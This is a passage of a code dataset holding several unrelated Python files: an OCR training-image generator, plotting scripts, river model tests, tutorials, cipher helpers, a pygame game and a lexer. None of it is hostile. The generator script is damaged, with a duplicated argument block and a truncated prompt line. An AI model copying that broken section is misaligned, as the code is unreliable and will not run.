#file labels.txt will then be parsed by file_parser.py to get all the .gt.txt files \n    )\n    parser.add_argument(\n        \"-d\",\n        \"--distorsion\",\n        type=int,\n        nargs=\"?\",\n        help=\"Define a distorsion applied to the resulting image. 0: None (Default), 1: Sine wave, 2: Cosine wave, 3: Random\",\n        default=0\n    )\n    parser.add_argument(\n        \"-do\",\n        \"--distorsion_orientation\",\n        type=int,\n        nargs=\"?\",\n        help=\"Define the distorsion's orientation. Only used if -d is specified. 0: Vertical (Up and down), 1: Horizontal (Left and Right), 2: Both\",\n        default=0\n    )\n    parser.add_argument(\n        \"-wd\",\n        \"--width\",\n        type=int,\n        nargs=\"?\",\n        help=\"Define the width of the resulting image. If not set it will be the width of the text + 10. If the width of the generated text is bigger that number will be used\",\n        default=-1\n    )\n    parser.add_argument(\n        \"-al\",\n        \"--alignment\",\n        type=int,\n        nargs=\"?\",\n        help=\"Define the alignment of the text in the image. Only used if the width parameter is set. 0: left, 1: center, 2: right\",\n        default=1\n    )\n    parser.add_argument(\n        \"-or\",\n        \"--orientation\",\n        type=int,\n        nargs=\"?\",\n        help=\"Define the orientation of the text. 0: Horizontal, 1: Vertical\",\n        default=0\n    )\n    parser.add_argument(\n        \"-tc\",\n        \"--text_color\",\n        type=str,\n        nargs=\"?\",\n        help=\"Define the text's color, should be either a single hex color or a range in the ?,? format.\",\n        #default='#282828'\n        default='#000000'\n    )\n    parser.add_argument(\n        \"-sw\",\n        \"--space_width\",\n        type=float,\n        nargs=\"?\",\n        help=\"Define the width of the spaces between words. 2.0 means twice the normal space width\",\n        default=0.5\n    )\n    parser.add_argument(\n        \"-m\",\n        \"--margins\",\n        type=margins,\n        nargs=\"?\",\n        help=\"Define the margins around the text when rendered. 
parser.add_argument(\n        \"-m\",\n        \"--margins\",\n        type=margins,\n        nargs=\"?\",\n        help=\"Define the margins around the text when rendered. In pixels\",\n        default=(3,5,3,5) #upper, left, lower, right\n    )\n    parser.add_argument(\n        \"-fi\",\n        \"--fit\",\n        action=\"store_true\",\n        help=\"Apply a tight crop around the rendered text\",\n        default=False\n    )\n    parser.add_argument(\n        \"-sf\",\n        \"--show_font\",\n        action='store_true',\n        help=\"Show the current font and its available characters before generation of files\",\n        default=False\n    )\n    parser.add_argument(\n        \"-ro\",\n        \"--rename_output\",\n        action=\"store_true\",\n        help=\"Rename the output, to give a unique filename to the resulting images\",\n        default=False\n    )\n    parser.add_argument(\n        \"-rm\",\n        \"--remove_old\",\n        action=\"store_true\",\n        help=\"Delete old files that may exist from previous runs\",\n        default=False\n    )\n    parser.add_argument(\n        \"-z\",\n        \"--zip_output\",\n        action=\"store_true\",\n        help=\"Create a zip file with the generated png and gt.txt files for easier upload to the server\",\n        default=False \n    )\n# =============================================================================\n# #TODO, not implemented yet \n# parser.add_argument(\n#     \"-cs\",\n#     \"--character_spacing\",\n#     type=float,\n#     nargs=\"?\",\n#     help=\"Define the spacing between the characters of a word\",\n#     default=1.0 \n# )\n# =============================================================================\n\n    return parser.parse_args()\n\ndef load_dict(lang):\n    \"\"\"\n    Read the dictionary file and return all the words in it.\n    \"\"\"\n\n    lang_dict = []\n    with open(os.path.join('dicts', lang + '.txt'), 'r', encoding=\"utf8\", errors='ignore') as d:\n        lang_dict = d.readlines()\n    return lang_dict\n\ndef load_fonts(lang):\n    \"\"\"\n    Load all fonts in the fonts directories\n    \"\"\"\n\n    if lang == 'cn':\n        return [os.path.join('fonts/cn', font) for font in os.listdir('fonts/cn')]\n    elif lang=='hist':\n        return [os.path.join('fonts/historic', font) for font in os.listdir('fonts/historic')]\n    else:\n        return [os.path.join('fonts/latin', font) for font in os.listdir('fonts/latin')]\n\n\n#this might not look as nice for other fonts with a different number of glyphs\ndef plot_font(): \n    path = os.path.join('fonts','historic', '1557-true_character_occurence.ttf')\n    ttf = TTFont(path, 0, allowVID=0,ignoreDecompileErrors=True,fontNumber=-1)\n    prop = mfm.FontProperties(fname=path)\n    \n    all_chars = [] \n    for x in ttf[\"cmap\"].tables:\n        for char in x.cmap.items():\n            true_char = chr(char[0])\n            all_chars.append(true_char) #all_chars now contains all the characters, format: (unicode, 'char'), e.g. 
(77, 'M')\n    \n    final_list = list(dict.fromkeys(all_chars)) #remove duplicates while keeping order \n    final_list[:] = [s for s in final_list if (s.isalpha() or (s in string.punctuation))] #remove \t,\n,\r, etc\n    final_list = final_list[:len(final_list)-1]\n    no_of_subplots = math.ceil(math.sqrt(len(final_list)))\n    \n    \n    fig, axs = plt.subplots(no_of_subplots,no_of_subplots, figsize=(8, 8), facecolor='w', edgecolor='k')\n    fig.subplots_adjust(hspace = .5, wspace=.001)\n\n    axs = axs.ravel()\n\n    for ax in axs: ax.axis('off')\n    for i in range(len(final_list)-2): #-2 to exclude the weird Ê and Ï symbols at the end \n        axs[i].text(0.5,0,s=final_list[i],fontproperties=prop,fontsize=20)\n        axs[i].set_title(\" \" + final_list[i])\n    \n    fig.tight_layout()\n    \n    textstr = 'not available: j, k, w, z --- F, J, K, U, V, W, X, Y, Z' \n    plt.text(0.2,0.07, textstr, fontsize=14, transform=plt.gcf().transFigure)\n    \n    plt.show() \n    ttf.close()\n\n\ndef main():\n    \"\"\"\n    Description: Main function\n    \"\"\"\n\n\n\n    # Argument parsing\n    args = parse_arguments()\n    args.count += 1  #generate one extra sample; the 0th file is deleted further down\n    \n    # Create font (path) list\n    fonts = load_fonts(args.language)\n\n    if args.show_font: \n        print('The following font will be used:',fonts[0],'\\n')\n        char = input('proceed? y(yes), n(no), s(show font)')\n        if char=='s' or char=='show font': \n            plot_font()\n            char2 = input('proceed? y(yes), n(no)')\n            if char2 != 'y': return\n        elif char!='y': \n            return \n\n    # Create the directory if it does not exist.\n    try:\n        os.makedirs(args.output_dir)\n    except OSError as e:\n        if e.errno != errno.EEXIST:\n            raise\n\n    # Creating word list\n    lang_dict = load_dict(args.language)\n\n    curr_dir = os.getcwd()\n    os.chdir(args.output_dir) \n\n    
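# the remove_old guard below only deletes generated artifacts (.png, .gt.txt, .zip) inside the output dir\n    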
(y/n) \".format(os.getcwd()))\n if answer == 'y': \n for file in os.listdir(os.getcwd()):\n if file.endswith('.png') or file.endswith('.gt.txt') or file.endswith('.zip'): \n os.remove(file)\n else: return \n\n os.chdir(curr_dir)\n # Creating synthetic sentences (or word)\n strings = []\n\n if args.use_wikipedia:\n strings = create_strings_from_wikipedia(args.length, args.count, args.language)\n elif args.input_file != '':\n strings = create_strings_from_file(args.input_file, args.count)\n elif args.random_sequences:\n strings = create_strings_randomly(args.length, args.random, args.count,\n args.include_letters, args.include_numbers, args.include_symbols, args.language)\n # Set a name format compatible with special characters automatically if they are used\n if args.include_symbols or True not in (args.include_letters, args.include_numbers, args.include_symbols):\n args.name_format = 2\n else:\n strings = create_strings_from_dict(args.length, args.random, args.count, lang_dict)\n\n\n string_count = len(strings)\n\n p = Pool(args.thread_count)\n for _ in tqdm(p.imap_unordered(\n FakeTextDataGenerator.generate_from_tuple,\n zip(\n [i for i in range(0, string_count)],\n strings,\n [fonts[random.randrange(0, len(fonts))] for _ in range(0, string_count)],\n [args.output_dir] * string_count,\n [args.format] * string_count,\n [args.extension] * string_count,\n [args.skew_angle] * string_count,\n [args.random_skew] * string_count,\n [args.blur] * string_count,\n [args.random_blur] * string_count,\n [args.background] * string_count,\n [args.distorsion] * string_count,\n [args.distorsion_orientation] * string_count,\n [args.handwritten] * string_count,\n [args.name_format] * string_count,\n [args.width] * string_count,\n [args.alignment] * string_count,\n [args.text_color] * string_count,\n [args.orientation] * string_count,\n [args.space_width] * string_count,\n [args.margins] * string_count,\n [args.fit] * string_count\n )\n ), total=args.count):\n pass\n p.terminate()\n\n\n\n if args.name_format == 2:\n # Create file with filename-to-label connections\n with open(os.path.join(args.output_dir, \"labels.txt\"), 'w', encoding=\"utf8\") as f:\n for i in range(string_count):\n file_name = str(i) + \".\" + args.extension\n f.write(\"{} {}\\n\".format(file_name, strings[i]))\n \n #create txt-files for nn groundtruth\n file_parser.parse_labels(args.extension)\n \n #delete 0th file bc it has strange start character that is not displayed in notepad but causes weird glyph in image\n os.chdir(args.output_dir)\n os.remove('0.png')\n os.remove('0.gt.txt')\n os.remove('labels.txt')\n \n \n \n # ------------------ rename all imgs ------------------\n \n if args.rename_output: \n for file in os.listdir(os.getcwd()):\n \n if file.endswith('.png'): \n file_name = file.split('.')[0]\n if(len(file_name)) > 10: continue #important, bc otherwise it will double-find the newly created unique_name.pngs\n txt_file = file_name + '.gt.txt'\n \n unique = str(uuid.uuid4().hex)\n unique_name_png = unique + '.png'\n unique_name_txt = unique + '.gt.txt'\n \n os.rename(file, unique_name_png)\n os.rename(txt_file, unique_name_txt)\n \n \n \n # ------------------ zip images ------------------\n \n if args.zip_output: \n \n import zipfile \n \n zip_name = str(uuid.uuid4().hex)+'.zip'\n zip_handler = zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED)\n \n for file in os.listdir(os.getcwd()): \n if not file.endswith('.zip'):\n zip_handler.write(file)\n \n zip_handler.close()\n print(\"\\nCreated Zip-Archive in 
{}.\".format(os.getcwd()))\n \n \n \n \n \n \n \n \n\nif __name__ == '__main__':\n main()\n","sub_path":"TextRecognitionDataGenerator/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":16726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"444826507","text":"#!/usr/bin/python3\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import NullFormatter\n\nfig, ax = plt.subplots(1, 2)\nprint(ax, type(ax), len(ax))\n\n# Number of Steps\nx = [16.43167673, 27.03701167, 76.15773106,]\n\nax[0].set(title=\"Avg n(Steps)\", xlabel=\"sqrt(n_squares)\", ylabel=\"Avg Steps\")\ny1 = [40, 3235, 650]\nax[0].plot(x, y1, label=\"Utility Based\", color=\"blue\", marker='o')\ny1 = [537.64, 3590, 1311]\n\nax[0].set_ylim(bottom=0)\nax[0].legend()\n\n\n# PEAK MEMORY\nax[1].set(title=\"Peak Memory\", xlabel=\"sqrt(n_squares)\", ylabel=\"MB\")\nax[1].set_ylim(bottom=60)\nax[1].set_ylim(top=70)\n\ny1 = [68.056, 66.45, 66.46]\nax[1].plot(x, y1, label=\"Utility Based\", color=\"blue\", marker='o')\nax[1].legend()\n\n\n\n\nfig.suptitle(\"Utility Based Agent\\nLength/history of body not considered\")\nplt.show()\n","sub_path":"knowledgerep/Assignment1/plots/plot_utility.py","file_name":"plot_utility.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"464642989","text":"def sol(A):\n dic = dict()\n for i in A:\n if bool(dic.get(i)) is False:\n dic[i] = 1\n else:\n dic.pop(i)\n for key in dic.keys():\n print(key)\n\nsol([9,3,9,3,9,7,9])","sub_path":"codility/OddOccurrencesInArray.py","file_name":"OddOccurrencesInArray.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"213065957","text":"import copy\nimport itertools\nimport math\nimport random\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model as sklm\nimport pytest\n\nfrom river import datasets\nfrom river import linear_model as lm\nfrom river import optim\nfrom river import preprocessing\nfrom river import stream\nfrom river import utils\n\n\ndef iter_perturbations(keys, n=10):\n \"\"\"Enumerate perturbations that will be applied to the weights.\"\"\"\n\n # Enumerate unit vectors\n for i in keys:\n yield {j: int(i == j) for j in keys}\n\n # Enumerate samples from a spherical Gaussian\n for _ in range(n):\n p = {j: random.gauss(0, 1) for j in keys}\n norm = utils.math.norm(p, order=2)\n for j in p:\n p[j] /= norm\n yield p\n\n\n@pytest.mark.parametrize(\n 'lm, dataset',\n [\n pytest.param(\n lm(optimizer=copy.deepcopy(optimizer), initializer=initializer, l2=0),\n dataset,\n id=f'{lm.__name__} - {optimizer} - {initializer}'\n )\n for lm, dataset in [\n (lm.LinearRegression, datasets.TrumpApproval()),\n (lm.LogisticRegression, datasets.Bananas())\n ]\n for optimizer, initializer in itertools.product(\n [\n optim.AdaBound(),\n optim.AdaDelta(),\n optim.AdaGrad(),\n optim.AdaMax(),\n optim.Adam(),\n optim.AMSGrad(),\n # TODO: check momentum optimizers\n # optim.Momentum(),\n # optim.NesterovMomentum(),\n optim.RMSProp(),\n optim.SGD()\n ],\n [\n optim.initializers.Zeros(),\n optim.initializers.Normal(mu=0, sigma=1, seed=42)\n ]\n )\n ]\n)\n@pytest.mark.slow\ndef test_finite_differences(lm, dataset):\n \"\"\"Checks the gradient of a linear model via finite differences.\n\n References\n ----------\n [^1]: [How to test gradient 
implementations](https://timvieira.github.io/blog/post/2017/04/21/how-to-test-gradient-implementations/)\n    [^2]: [Stochastic Gradient Descent Tricks](https://cilvr.cs.nyu.edu/diglib/lsml/bottou-sgd-tricks-2012.pdf)\n\n    \"\"\"\n\n    scaler = preprocessing.StandardScaler()\n    eps = 1e-6\n\n    for x, y in dataset:\n\n        x = scaler.learn_one(x).transform_one(x)\n\n        # Store the current gradient and weights\n        gradient, _ = lm._eval_gradient_one(x, y, 1)\n        weights = copy.deepcopy(lm._weights)\n\n        # d is a set of weight perturbations\n        for d in iter_perturbations(weights.keys()):\n\n            # Perturb the weights and obtain the loss with the new weights\n            lm._weights = utils.VectorDict({i: weights[i] + eps * di for i, di in d.items()})\n            forward = lm.loss(y_true=y, y_pred=lm._raw_dot_one(x))\n            lm._weights = utils.VectorDict({i: weights[i] - eps * di for i, di in d.items()})\n            backward = lm.loss(y_true=y, y_pred=lm._raw_dot_one(x))\n\n            # We expect g and h to be equal\n            g = utils.math.dot(d, gradient)\n            h = (forward - backward) / (2 * eps)  # central finite difference\n\n            # Compare signs\n            # TODO: reactivate this check\n            #assert np.sign(g) == np.sign(h)\n\n            # Check absolute difference\n            # TODO: decrease the tolerance\n            assert abs(g - h) < 1e-5\n\n        # Reset the weights to their original values in order not to influence\n        # the training loop, even though it doesn't really matter.\n        lm._weights = weights\n        lm.learn_one(x, y)\n\n\ndef test_one_many_consistent():\n    \"\"\"Checks that using learn_one or learn_many produces the same result.\"\"\"\n\n    X = pd.read_csv(datasets.TrumpApproval().path)\n    Y = X.pop('five_thirty_eight')\n\n    one = lm.LinearRegression()\n    for x, y in stream.iter_pandas(X, Y):\n        one.learn_one(x, y)\n\n    many = lm.LinearRegression()\n    for xb, yb in zip(np.array_split(X, len(X)), np.array_split(Y, len(Y))):\n        many.learn_many(xb, yb)\n\n    for i in X:\n        assert math.isclose(one.weights[i], many.weights[i])\n\n\ndef test_shuffle_columns():\n    \"\"\"Checks that learn_many works identically whether columns are shuffled or not.\"\"\"\n\n    X = pd.read_csv(datasets.TrumpApproval().path)\n    Y = X.pop('five_thirty_eight')\n\n    normal = lm.LinearRegression()\n    for xb, yb in zip(np.array_split(X, 10), np.array_split(Y, 10)):\n        normal.learn_many(xb, yb)\n\n    shuffled = lm.LinearRegression()\n    for xb, yb in zip(np.array_split(X, 10), np.array_split(Y, 10)):\n        cols = np.random.permutation(X.columns)\n        shuffled.learn_many(xb[cols], yb)\n\n    for i in X:\n        assert math.isclose(normal.weights[i], shuffled.weights[i])\n\n\ndef test_add_remove_columns():\n    \"\"\"Checks that no exceptions are raised whenever columns are dropped and/or added.\"\"\"\n\n    X = pd.read_csv(datasets.TrumpApproval().path)\n    Y = X.pop('five_thirty_eight')\n\n    lin_reg = lm.LinearRegression()\n    for xb, yb in zip(np.array_split(X, 10), np.array_split(Y, 10)):\n        # Pick half of the columns at random\n        cols = np.random.choice(X.columns, len(X.columns) // 2, replace=False)\n        lin_reg.learn_many(xb[cols], yb)\n\n\ndef test_lin_reg_sklearn_coherence():\n    \"\"\"Checks that the sklearn and river implementations produce the same results.\"\"\"\n\n    class SquaredLoss:\n        \"\"\"sklearn removes the leading 2 from the gradient of the squared loss.\"\"\"\n\n        def gradient(self, y_true, y_pred):\n            return y_pred - y_true\n\n    ss = preprocessing.StandardScaler()\n    cr = lm.LinearRegression(optimizer=optim.SGD(.01), loss=SquaredLoss())\n    sk = sklm.SGDRegressor(learning_rate='constant', eta0=.01, alpha=.0)\n\n    for x, y in datasets.TrumpApproval():\n        x = ss.learn_one(x).transform_one(x)\n        cr.learn_one(x, y)\n        
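# sklearn's online API expects a 2-D batch, so the single sample dict is wrapped in a one-row list\n        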
sk.partial_fit([list(x.values())], [y])\n\n    for i, w in enumerate(cr.weights.values()):\n        assert math.isclose(w, sk.coef_[i])\n\n    assert math.isclose(cr.intercept, sk.intercept_[0])\n\n\ndef test_log_reg_sklearn_coherence():\n    \"\"\"Checks that the sklearn and river implementations produce the same results.\"\"\"\n\n    ss = preprocessing.StandardScaler()\n    cr = lm.LogisticRegression(optimizer=optim.SGD(.01))\n    sk = sklm.SGDClassifier(learning_rate='constant', eta0=.01, alpha=.0, loss='log')\n\n    for x, y in datasets.Bananas():\n        x = ss.learn_one(x).transform_one(x)\n        cr.learn_one(x, y)\n        sk.partial_fit([list(x.values())], [y], classes=[False, True])\n\n    for i, w in enumerate(cr.weights.values()):\n        assert math.isclose(w, sk.coef_[0][i])\n\n    assert math.isclose(cr.intercept, sk.intercept_[0])\n\n\ndef test_perceptron_sklearn_coherence():\n    \"\"\"Checks that the sklearn and river implementations produce the same results.\"\"\"\n\n    ss = preprocessing.StandardScaler()\n    cr = lm.Perceptron()\n    sk = sklm.Perceptron()\n\n    for x, y in datasets.Bananas():\n        x = ss.learn_one(x).transform_one(x)\n        cr.learn_one(x, y)\n        sk.partial_fit([list(x.values())], [y], classes=[False, True])\n\n    for i, w in enumerate(cr.weights.values()):\n        assert math.isclose(w, sk.coef_[0][i])\n\n    assert math.isclose(cr.intercept, sk.intercept_[0])\n","sub_path":"river/linear_model/test_glm.py","file_name":"test_glm.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"238255700","text":"\"\"\"list of dictionaries (dict inside list)\"\"\"\nalien_0 = {'color': 'green', 'points': 5}\nalien_1 = {'color': 'red', 'points': 10}\nalien_2 = {'color': 'yellow', 'points': 15}\naliens = [alien_0, alien_1, alien_2]\nfor alien in aliens:\n    print(alien)\nprint(\".............\")\n\n#make an empty list for storing aliens\naliens = []\n#make 30 aliens\nfor alien_number in range(30): #for variable in range():\n    new_alien = {'color': 'green', 'points': 5, 'speed': 'slow'}\n    #new_alien = new variable\n    aliens.append(new_alien) #variables.append(new_variable)\n#show the first 5 aliens\nfor alien in aliens[:5]: #need another for loop if we want to print\n    print(alien)\nprint(\"....\")\n#show how many aliens have been created\nprint(f\"the total number of aliens: {len(aliens)}\")\n#print(f\"{len(variable which is name of list)}\")\nprint(\"......\")\n\"\"\"change color using for loop and if statement\"\"\"\naliens = []\nfor alien_number in range(30):\n    new_alien = {'color': 'green', 'points': 5, 'speed': 'slow'}\n    aliens.append(new_alien)\n#change the first 3 aliens\nfor alien in aliens[:3]:\n    #if variable_name['key']=='value'\n    if alien['color'] == 'green': #remember ==\n        #variable_name['key']= 'new_value'\n        alien['color'] = 'yellow' #remember = not == or it won't work\n        alien['points'] = 10\n        alien['speed'] = 'medium'\n    elif alien['color'] == 'yellow': #use elif to turn yellow to red\n        alien['color'] = 'red'\n        alien['points'] = 15\n        alien['speed'] = 'fast'\nfor alien in aliens[:5]:\n    print(alien)\nprint(\".......\")\n\"\"\"list in a dictionary\"\"\"\n#store information about a pizza being ordered\npizza = {\n    'crust': 'thick',\n    'toppings': [\n        'mushrooms',\n        'extra cheese',\n    ],\n}\n#summarize the order\nprint(f\"you ordered a {pizza['crust']} crust pizza\" #name['key']\n      \" with the following toppings:\")\n#a print() call can span lines: end the first line after a string literal, then indent the continuation\nfor topping in pizza['toppings']:\n    #for variable in name['key']:\n    
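# each topping prints tab-indented on its own line\n    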
print(f\"\\t{topping}\")\nprint(\".......\")\n'''use another for loop inside a for loop'''\nfavorite_languages = {\n    'jen': ['python', 'ruby'],\n    'sarah': ['c'],\n    'edward': ['ruby', 'go'],\n    'phill': ['python', 'haskell'],\n}\nfor name, languages in favorite_languages.items():\n    if len(languages) >= 2:\n        print(f\"\\n{name.title()}'s favorite languages are:\")\n    else:\n        print(f\"\\n{name.title()}'s favorite language is:\")\n    for language in languages:\n        #need this because the value is a list \n        #without another for loop we would not loop through the list\n        print(f\"\\t{language.title()}\")\n'''dictionary in dictionary'''\nusers={\n    'aeinstein':{ #key_1\n        #this chunk is value 1 \n        'first':'albert', #key_2 : value_2\n        'last':'einstein',\n        'location':'princeton',\n    },\n    'mcurie':{ #key_1\n        #this chunk is value 1\n        'first':'marie', #key_2 : value_2\n        'last':'curie',\n        'location':'paris',\n    },\n}\nfor username, user_info in users.items():\n    print(f\"\\nUsername: {username}\")\n    full_name = f\"{user_info['first']}{user_info['last']}\"\n    location = user_info['location']\n    print(f\"\\tFull name: {full_name.title()}\")\n    print(f\"\\tLocation: {location.title()}\")\n\n","sub_path":"chapter 6/chap 6 nesting .py","file_name":"chap 6 nesting .py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"513194344","text":"class Travel_Methods():\n    def __init__(self):\n        pass\n\n    # no instance state is used, so these are plain static helpers\n    @staticmethod\n    def convert_to_minutes(time_array):\n        minutes_array=[]\n        for x in time_array:\n            hour = int(str(x).split(\".\")[0])\n            minutes = int(float(\"%.2f\" % (x-hour))*100)\n            if hour in [0,1,2,3]:\n                hour = hour+24\n            minutes_array.append(hour*60+minutes)\n        return sum(minutes_array)/len(time_array)\n\n    @staticmethod\n    def convert_to_hours(minutes_average):\n        hour = int(minutes_average/60)\n        minute = ((minutes_average / 60 - hour) * 60) / 100\n        minute = float(\"%.2f\" % minute)\n\n        if hour==24:\n            hour =12\n        elif hour>24:\n            hour=hour-24\n        elif hour>12:\n            hour=hour-12\n\n        hour_minute = float(\"%.2f\" % (hour + minute))\n        hour_minute = str(hour_minute).replace(\".\",\":\")\n        if len(hour_minute.split(\":\")[1])==1:\n            hour_minute = hour_minute+\"0\"\n        return hour_minute","sub_path":"travel/management/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"430365636","text":"\n\nfrom xai.brain.wordbase.adjectives._timid import _TIMID\n\n#class header\nclass _TIMIDEST(_TIMID, ):\n\tdef __init__(self,): \n\t\t_TIMID.__init__(self)\n\t\tself.name = \"TIMIDEST\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"timid\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_timidest.py","file_name":"_timidest.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"188565496","text":"#!/usr/bin/env python\n\n__author__ = \"Jeanna Clark\"\n__version__ = \"1.0\"\n# May 3, 2017\n# LC-101: Intro to Python Programming\n# Crypto Project [https://runestone.launchcode.org/runestone/static/thinkcspy/ProblemSets/Crypto.html]\n\n# This program implements a Caesar & Vigenère cipher encryption algorithm\n\n\nimport string\n\n\ndef alphabet_position(letter):\n    \"\"\"This function receives a character & returns its 0-based numerical position\"\"\"\n    # e.g. alphabet_position('C') == 2\n    alphabet = string.ascii_lowercase\n    return alphabet.index(letter.lower())\n\n\ndef rotate_character(char, rot):\n    \"\"\"This 
function receives a character and rotation value & returns the rotated character\"\"\"\n if (char in string.punctuation) or char.isspace() or char.isdigit():\n return char\n\n alphabet = string.ascii_lowercase\n encryption_index = alphabet_position(char) + rot\n return alphabet[encryption_index % 26]\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"529451141","text":"import pygame\nfrom world import PygameWorld\n\nFPS = 15\nWIDTH = 512\nHEIGHT = 512\nBLACK = (0, 0, 0)\nGREY = (132, 130, 132)\n\npygame.init()\n\nscreen = pygame.display.set_mode([WIDTH, HEIGHT])\npygame.display.set_caption(\"Bomberman Game\")\n\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n\ndone = False\n\nworld = PygameWorld(screen)\n\n# -------- Main Program Loop -----------\nwhile world.player.is_alive():\n for event in pygame.event.get(): # User did something\n if event.type == pygame.QUIT: # If user clicked close\n done = True # Flag that we are done so we exit this loop\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_UP:\n world.player.change_direction(world.player.NORTH)\n elif event.key == pygame.K_DOWN:\n world.player.change_direction(world.player.SOUTH)\n elif event.key == pygame.K_RIGHT:\n world.player.change_direction(world.player.RIGHT)\n elif event.key == pygame.K_LEFT:\n world.player.change_direction(world.player.LEFT)\n elif event.key == pygame.K_b:\n world.place_bomb()\n \n # make things happen\n world.run()\n \n # Set the screen background\n screen.fill(GREY)\n \n # draw world\n world.draw()\n \n # Limit to 20 frames per second\n clock.tick(FPS)\n \n # Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n\n# Be IDLE friendly. 
If you forget this line, the program will 'hang'\n# on exit.\npygame.quit()","sub_path":"Python_Work/Bomberman1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"55352153","text":"# -*- coding: utf-8 -*-\n# @Time : 2019-04-03 21:52\n# @Author : Billy-Nie\n# @FileName: utils.py\n# @E-mail :niechenxiHIT@126.com\n\n\"\"\"\nDefine some constants and simple predicate helpers that are used in the later analysis.\n\"\"\"\n\nfrom DFA_convert import DFA_converter\n\n####################\n#     constants     #\n####################\n# operators\noperator = ['+', '-', '*', '=', '<', '>', '&', '|', '~', '^', '!', '(', ')', '[', ']', '{', '}', '%', ';', ',', '#']\n# delimiters\nboundary = [',', ';', '[', ']', '(', ')', '{', '}']\n# keywords\nkeywords = [ \"auto\", \"double\", \"int\", \"struct\", \"break\", \"else\", \"long\", \"switch\", \"case\", \"enum\", \"register\",\n             \"typedef\", \"char\", \"extern\", \"return\", \"union\", \"const\", \"float\", \"short\", \"unsigned\", \"continue\", \"for\", \"signed\", \"void\",\n             \"default\", \"goto\", \"sizeof\", \"volatile\", \"do\", \"if\", \"while\", \"static\", \"main\", \"String\"]\n\n####################\n#    predicates     #\n####################\ndef isPlusOp(ch):\n    # the 'e' of scientific notation, the operator after it and the digits should form a single token\n    return ch == \"e\"\n\ndef isAlpha(ch):\n    \"\"\"\n    Check whether this fragment starts an identifier or a keyword;\n    identifiers and keywords may only start with a-z, A-Z or _\n    \"\"\"\n    return ((ch >= 'a' and ch <= 'z') or (ch >= 'A' and ch <= 'Z') or ch == '_' )\n\ndef isOp(ch):\n    '''\n    Check whether this fragment is an operator\n    '''\n    return ch in operator\n\ndef isDigit(ch):\n    \"\"\"\n    Check whether the character is a digit\n    \"\"\"\n    return (ch >= '0' and ch <= '9')\n\ndef isKeywords(str):\n    \"\"\"\n    Check whether the input string is a valid keyword\n    \"\"\"\n    return str in keywords\n\ndef isPlusEqu(ch):\n    \"\"\"\n    Operators that may be followed by '='\n    \"\"\"\n    plusEqu = ['+', '-', '*', '/', '=', '>', '<', '&', '|', '^', '!']\n    return ch in plusEqu\n\ndef isPlusSame(ch):\n    # operators that may be doubled, e.g. ++, --\n    plusSame = ['+', '-', '&', '|', '=', '<', '>']\n    return ch in plusSame\n\ndef isChar(ch):\n    return ch == \"'\"\n\ndef isString(ch):\n    return ch == '\"'\n\n#####################\n#        DFA        #\n#####################\n\ndigitDFA_path = \"DFA/DigitDFA\"\ncharDFA_path = \"DFA/charDFA\"\nstringDFA_path = \"DFA/stringDFA\"\ncommentDFA_path = \"DFA/commentDFA\"\nO_H_DFA_path = \"DFA/O_H_DFA\"\n\n\nclass DigitDFA:\n    __digitDFA = None\n    __final_state = None\n    __digitDFA_path = None\n\n\n    def __init__(self, digitDFA_path):\n        self.__digitDFA_path = digitDFA_path\n        self.__digitDFA, self.__final_state = DFA_converter(self.__digitDFA_path).convert()\n\n    def in_digitDFA(self, program_fraction):\n        \"\"\"\n        Check whether the given program fragment is accepted by this automaton\n        :param program_fraction: the program fragment\n        :return: Boolean, True  -- accepted\n                          False -- rejected\n        \"\"\"\n        state = 0  # current state of the automaton\n        is_float = False\n\n        for i in range(len(program_fraction)):\n            DFA_state = self.__digitDFA[state]\n            ch = program_fraction[i]\n            if ch == '.' or ch == 'e':\n                is_float = True\n            if isDigit(ch):\n                if \"d\" in DFA_state:\n                    state = DFA_state.index(\"d\")\n                else:\n                    error_message = \"state \" + str(state) + \" cannot accept character \" + ch\n                    return (False, error_message)\n            
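# 'e', '.' and '-' are explicit edge labels in the DFA transition table (floats and scientific notation)\n            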
elif (ch == 'e' or ch == '.' or ch == '-'):\n                if ch in DFA_state:\n                    state = DFA_state.index(ch)\n                else:\n                    error_message = \"state \" + str(state) + \" cannot accept character \" + ch\n                    return (False, error_message)\n            else:\n                error_message = \"the input contains an illegal character\"\n                return (False, error_message)  # an illegal character appeared\n\n\n        if str(state) in self.__final_state:\n            return (True, is_float)\n        else:\n            error_message = \"the automaton stopped in a non-final state\"\n            return (False, error_message)\n\nclass CharDFA:\n    __charDFA = None\n    __final_state = None\n    __charDFA_path = None\n\n    def __init__(self, charDFA_path):\n        self.__charDFA_path = charDFA_path\n        self.__charDFA, self.__final_state = DFA_converter(self.__charDFA_path).convert()\n\n    def in_charDFA(self, program_fraction):\n        state = 0\n\n        for i in range(len(program_fraction)):\n            ch = program_fraction[i]\n            DFA_state = self.__charDFA[state]\n\n            if ch in 